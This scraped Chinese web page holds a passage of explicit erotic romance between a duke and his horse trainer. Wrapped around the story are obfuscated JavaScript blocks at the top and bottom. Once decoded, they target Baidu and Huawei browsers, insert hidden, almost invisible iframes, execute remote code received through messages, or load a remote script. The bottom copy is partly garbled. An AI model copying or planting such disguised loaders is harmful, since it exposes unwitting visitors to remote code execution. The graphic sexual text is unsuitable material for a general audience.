王爷肉高H文_宫交直到怀孕h文

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
两人关系逐渐升温的时候,马术大赛也差不多快要举办了。

这一次比赛,附近好几个邻国的国王的爱马都有参加,听说布涞尔的国王还在宴会上夸下海口,说自己的马一定会赢得比赛。

这可攸关一国之君的颜面。

如果自己的马可以赢得大赛,那可大大出风头啦!

这件事传到只顾着和汉弥顿公爵鬼混的国王耳里,顿时激起了国王的好胜心,于是,国王也在百忙之中几次派人到公爵府查看马匹情况。

「公爵大人,国王陛下还要我告诉你,如果赢得比赛,他一定会重赏你跟雷恩‧克尔曼先生。」王g使者说。

「谢谢,请转告陛下,我们一定会好好照顾这两匹宝贝马。」

可是,越接近马术大赛,韦恩公爵的心情就越不好了。

雷恩‧克尔曼那家伙,最近心思都跑到那两匹即将比赛的马身上了,每天早上起来,公爵都发现身边的床位空空如也。

甚至有一天晚上,公爵睡到一半,迷迷糊糊醒来,觉得没有平时暖和,发觉应该正搂着自己的男人不翼而飞。

后来问那个臭马夫,才知道他竟然放心不下马儿,半夜到马厩里再检查了一次。

死马!

烂马!

竟然抢本公爵的男人。

随着比赛日期一天天逼近,雷恩‧克尔曼对那两匹马是万般宠爱,照顾得无微不至,让高傲的公爵大为吃味。

「那家伙今天又跑去马厩了吗?」公爵看看一大桌的美食,再看看那隔壁那张空椅子,一脸得不高兴。

「是的,公爵大人,雷恩‧克尔曼先生对马匹的照顾真是j心啊。」

「哼,已经到了废寝忘食的地步了!」

「看来,我们敬爱的国王陛下这一次一定可以得偿所愿,拿到比赛的头等奖。」谈起公爵府里这个地位特殊的马夫,管家的语气里也不禁充满了赞赏,「雷恩‧克尔曼先生不愧是一流的驯马师,不仅有最高超的驯马技巧,同时也对马充满了别的驯马师无法给予的爱与关怀。可以做雷恩‧克尔曼的马的话,一定很幸福。」

公爵心里更不舒服。

有两匹马争宠已经够讨厌了,你这混蛋不会想犯上作乱,抢你主人的马夫吧?

找死呀?

韦恩公爵黑起俊脸,恶狠狠瞪着自己的管家,「你是不是吃错药啦?人不做,想做马?要不要本公爵立即把你关到马厩去,让你幸福一下?」

管家吓了一跳,赶紧摆手,「不不不!公爵大人,我只是转述一下……」

「转述?转述谁的?」

「呃,那些常在雷恩‧克尔曼先生身旁围绕的少女啊。」

「什么?什么少女?」韦恩公爵的腔调立即变了。

雷恩‧克尔曼!

你敢背着本公爵乱搞?我咔嚓了你的「马鞭」!

「哦,雷恩‧克尔曼先生对女人来说,可是充满了与众不同的魅力呢。他到公爵府里几个月,已经有一堆女侍在悄悄暗恋他了。」为了转移主人的注意力,管家赶紧向韦恩公爵报告打听到的花边新闻。d_a

「嗯?」

「不仅仅是女侍们,上一次卡瓦小姐过来说要请教马术,我看她也是想接近雷恩‧克尔曼先生吧。不过,雷恩‧克尔曼先生似乎对女人没什么兴趣。」

「那当然。」

他只对本公爵有兴趣。

尝过本公爵这种美味鲜嫩的青草后,本公爵就不信他还能咽得下那些像放了八九年的干草一样难入口的女人。

「我想也是的,在雷恩‧克尔曼先生心目中,任何人都比不上那两匹完美的马。」

「什么?马?你不要道听涂说!在那家伙心目中,当然有比那两匹马更重要的人。」

「公爵大人,我可不是道听涂说,这些话可是克尔曼先生亲口跟我说的啊。」

韦恩公爵的脸色霍然一变。

「你说的是真的?」

「我可不敢骗您,公爵大人。」

好啊!

你这个臭马夫!

在你心目中,难道本公爵竟然比不上那两匹烂马?

白天照顾还不够,晚上还要撇下本公爵,溜出去照顾它们。

死马!

本公爵就不相信,不能把雷恩‧克尔曼从你们那里抢回来!

韦恩公爵一脸毅然地站了起来。

「韦恩公爵,你这是要去哪里?」

「去找雷恩‧克尔曼!」

「可是,克尔曼先生说了今天要带马儿出去野外放风啊。这是他和马匹培养默契的私密时间。」

培养默契?

私密时间?

岂有此理,在本公爵的马厩里亲密还不够,还要去野外搞默契?

不可容忍!

韦恩公爵的斗志瞬间点燃。

「从今天开始,凡是雷恩‧克尔曼和马在一起,本公爵都要跟着。这是为了……为了更好执行国王陛下交付给本公爵的使命!」

韦恩公爵连饭都不吃,满腔妒火地跑去和马儿争宠了!

阳光明媚,万里无云。

首都罗伦斯的近郊,绿草如茵,繁花盛开,一片春意盎然……

两位风格迥异,却都令人眼前一亮的美男子正坐在草地上,而两匹神骏非凡的宝马则在远远的那头悠哉地吃着新鲜的青草。

雷恩‧克尔曼看着坐在一旁一语不发的韦恩公爵,笑笑地说,「公爵大人今天怎么有这个闲情逸致,跟着我出来遛马呢?」

「哦,没什么,只是本公爵发现经过这段时间的相处,我对养马愈来愈有兴趣了。」杜玛斯‧韦恩公爵为了掩饰自己的来意,连忙开口解释。

「是吗?」雷恩‧克尔曼惊讶地挑了挑眉。

没想到这个贵族公子哥儿也会对养马有兴趣,他以前不是连马厩都嫌臭不想进去的吗?

不过如果他真的对养马有兴趣,他倒是很乐意和他分享经验。

「养马是件很有挑战x,但也很累人的事。我从三岁起就跟着我父亲养马,十岁起就开始学习驯马。马是非常有灵x的动物,他们聪明而忠贞。这几年我走遍了世界各地,到处寻找具有潜力的野马,虽然辛苦但也很有成就感。如果公爵对养马有兴趣,我可以传授你一些技巧。」

看到男人一讲起「马经」就眉飞色舞,杜玛斯‧韦恩公爵的心里更加吃味了。

哼,马有什么好的?

它的容貌有本公爵完美吗?

它的肌肤有本公爵滑嫩吗?

它的毛发有本公爵亮丽吗?

还有,还有,本公爵可是家教良好,不随便到处便溺的!

杜玛斯‧韦恩公爵在心中不是滋味地说。

如果那些爱慕杜玛斯‧韦恩公爵的人,知道向来心高气傲的他,竟然与马争风吃醋到这种地步,大概会晕倒一片吧!

「雷恩‧克尔曼,我问你一个问题。」

「问吧。」

「你也快三十了,为什么到现在还不结婚啊?」

「结婚?」雷恩‧克尔曼皱起了眉头,「我为什么要结婚?」

「难道你不想找个对象,好好安定下来,结束这种漂泊的生活?」

「我现在这种生活有什么不好?周游列国,随心所欲,日子多么自由自在啊。我可不想被绑住,待在同一个地方到老到死。」

杜玛斯‧韦恩公爵不知为何,心中像被什么堵住似的,闷的难受。d_a

「那你这次会在罗伦斯待多久?」

「等到马术大赛结束就走。」

「走?」韦恩公爵地心头一阵慌乱。「去哪里?」

「北方有个叫阿尔巴森林的地方,有人在那里见过一匹神驹,我想去看看。」

「阿尔巴森林……好遥远的地方啊……」杜玛斯‧韦恩公爵的心头突然一阵空虚。

两人之间有一阵短暂的沉寂。

突然──

「你带我去吧!!」

「啊?」雷恩‧克尔曼睁大了眼,以为自己听错了。

「啊什么?本公爵现在对马非常有兴趣。既然听说有神驹可以看,我当然要去啦!」

「公爵大人在开玩笑吧?我出门向来简装便行,可没办法让你带着一堆侍从跟着。」

「谁说他们要跟啦?我可以自己一个人去。」

雷恩‧克尔曼差点笑出声来。

这个连洗澡都要有人伺候的公子哥儿,怎么可能自己一个人跟着他旅行千里,到那蛮荒之地?

难道他……

「喂,我说我天真的小母马。」雷恩•克尔曼突然直勾勾地盯着他,「你该不会是喜欢上我了吧?」

「喜…喜欢你个头!少臭美了!」杜玛斯•韦恩公爵脸红似火。

「脸红了?嗯,看来你真的喜欢上我了。不过这也不奇怪啦,被我驯服过的小野马,向来对我都是服服帖帖的。」

「雷恩•克尔曼,闭上你的臭嘴!」杜玛斯•韦恩公爵气得扑上去,抓住他的衣领大吼!

「啊,我的小母马发飙的时候真漂亮。」

看到男人突然深情款款地看着他,杜玛斯•韦恩公爵不由得心跳加速。

四目相交,暧昧的气氛在两人之间流动……

韦恩公爵看着男人英挺的眉目,这段日子以来的欢笑与甜蜜一一浮现脑海。

想到在不久的将来,他一离开,或许再也见不了面了,韦恩公爵的心里就一阵阵地刺痛。

「吻我。」

雷恩•克尔曼惊讶地挑了挑眉。

奇怪,向来对他都是又打又骂的公爵大人,今天怎么主动求爱了?

嗯,看来他的小母马真对他动心了。

一向对别人的求爱无动于衷的浪子,这次却意外地开心。

「笑什么笑啊?本公爵的命令,你没听到吗?」杜玛斯•韦恩公爵被男人脸上的笑容弄得又羞又怒。

看到他的小母马越生气,雷恩•克尔曼笑得越开心。

「可恶!你这个臭——」

韦恩公爵的话被男人突如其来的吻封住了——

火热的舌头在口腔中肆无忌惮地侵略,交换着甜美的津y……

韦恩公爵被吻得神魂颠倒,双手不自觉地抱住男人的颈项,与他疯狂地拥吻。

「哼嗯……唔……」

醉人的呻吟不断地从唇瓣溢出,韦恩公爵抱着那健壮的身躯,在他身上难耐地扭动着……

「哦哦……我要……我要……」

「呼呼……你这只骚母马……」

雷恩•克尔曼被公爵难得的大胆主动挑起了无比的肆虐心,他将公爵移到自己的上方,一把撕开了他缀满蕾丝的华丽上衣——

两个粉红色的r尖像花苞般漂亮地挺立着,仿佛在叫人前来攫取那甜美的花蜜……

男人的呼吸急促起来,一口就含上了那引人犯罪的r珠——

「啊啊——」从r尖直达心脏的强烈快感让韦恩公爵尖叫出声!

「啧…啧……」男人用唇舌玩弄着那y荡挺立的r珠,发出可耻的声响。

「呜哦哦……天啊……不要再吸了……不要啊……」杜玛斯•韦恩公爵摇着一头美丽的金色长发,发出抗拒的呜咽。

但明明嘴里喊着不要,双手却c进了男人的发丝,拼命地将他压向自己的x前。

「啧…啧……」

男人拼命地对着早已经红肿不堪的r头又咬又吸,让杜玛斯•韦恩公爵有瞬间的错觉,仿佛自己的r头即将喷出r汁——

「啊啊……我受不了了……呜呜……r头要破了——」杜玛斯•韦恩公爵弓起身子哀哀地叫起来。d_a

「哼嗯……好甜啊……我的小母马……等你怀了我的小马,你的r汁我一定不分给宝宝!它是我的!全都是我的!」雷恩•克尔曼霸道地吸住了另一颗r头。

「哦哦——你疯了……不要胡说……」杜玛斯•韦恩公爵被男人的话羞得浑身发颤,但心口却是阵阵发甜。

「我没有胡说啊,不信的话,我们现在就来努力吧!」

「什么?不要!这里是户外,随时有人会经过——你不要这样!」

雷恩•克尔曼向来大胆妄为,他不顾公爵的挣扎,一把将他压跪在地上,握住自己巨大的「马鞭」,从背后重重地贯穿了他的小母马——

「哇啊啊啊——」杜玛斯•韦恩公爵发出长长的尖叫——

又硬又chu的巨b突破了紧窒的x口,猛地撞进了他炙热的肠道,让杜玛斯•韦恩公爵在一瞬间就疯狂了——

「我的小母马,走,我带你去溜溜……」

男人巨大的x器还c在他心爱的小母马的身躯里,他抓住了那头闪亮的金色发丝,像骑马似的,不停地催促他向前进——

「呜啊啊——好深啊——c死我了——」

每往前走一步,体内的巨鞭就剧烈地撞上体内致命的敏感点,杜玛斯•韦恩公爵仰起头大声地哭叫起来——

蓝色的天空,绿色的草地。

一人一「马」在野外「骑乘」,骑得热火朝天。

雷恩•克尔曼挥汗如雨,不停摇摆着腰部,c干着身下的小母马。

「呼呼……爽死了……说!你是不是我的小母马?」

杜玛斯•韦恩公爵羞得脸都红了,转头大声喝斥!「谁是马啊?你这个坏蛋不要胡说!」

「好啊,还不老实承认……看我怎么教训你。」

雷恩•克尔曼邪邪一笑,突然将自己的x器猛地抽了出来——

「啊啊——」不要走!!

体内一阵恐怖的空虚,已经习惯r体的满足的杜玛斯•韦恩公爵,万般难受地扭动起身体。

经过了多日的调教,雷恩•克尔曼当然明白自己小母马y荡的本x。他将巨鞭抵住那湿答答的x口,开始画起圈圈……

「呜哦哦……上帝啊——」杜玛斯•韦恩公爵痛苦地哭叫着!「好痒……里面痒死了……快进来——快进来啊——」

「要我进去可以啊,你说,你是不是我的小母马?」

「呜……我——我——」呜…这个臭马夫!这种丢死人的话,他堂堂杜玛斯•韦恩公爵怎么说得出来啊?

「我警告你啊,我雷恩•克尔曼最讨厌人家骗我了,你最好老实说出来,不然还有得你受的。」雷恩•克尔曼坏心地将巨b在x口处浅浅地刺入抽出,让韦恩公爵体内像有万只蚂蚁在爬似的,让他痒得哭叫不休……

「呜啊啊……我受不了了……救我……雷恩•克尔曼,快救我——」

「说,你是谁的小母马?」雷恩•克尔曼将巨b往前推进了一寸。

体内难以承受的骚痒让杜玛斯•韦恩公爵终于放下了矜持,哭叫着说出自己心底深处的秘密!「啊啊——我是你的——我是你的小母马——」

听到公爵的吶喊,饶是向来冷静的雷恩•克尔曼也为之疯狂了!

他扯着那头金色的长发,猛地直c到小x的最深处——

「哇啊啊啊——」

身份尊贵的杜玛斯•韦恩公爵四肢着地,在随时都可能被人撞见的草原上,像只母马般被狠狠地骑乘着。

「啊啊啊啊——c我!再用力c我!」

杜玛斯•韦恩公爵渴望的大rb不停地在他饥渴的rx中戳刺c干,两人x器交接处不停地喷出大量的yy,流满了公爵白晰修长的大腿……

「啊啊——好爽!爽死我了!雷恩•克尔曼,c死你的小母马吧!我不要活了!c死我吧!」

公爵的主动大胆引爆了最后的激情,雷恩俯身紧紧地咬住他的肩膀,一阵疯狂地抽cc干,嘶吼着sj了——

「啊啊——我的小母马!你是我的!我一个人的!」

滚烫的热j一股又一股地喷s在被c得快融化的肠壁上,杜玛斯•韦恩公爵浑身一阵哆嗦,在男人的拥抱下,也痛快淋漓地sj了……
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}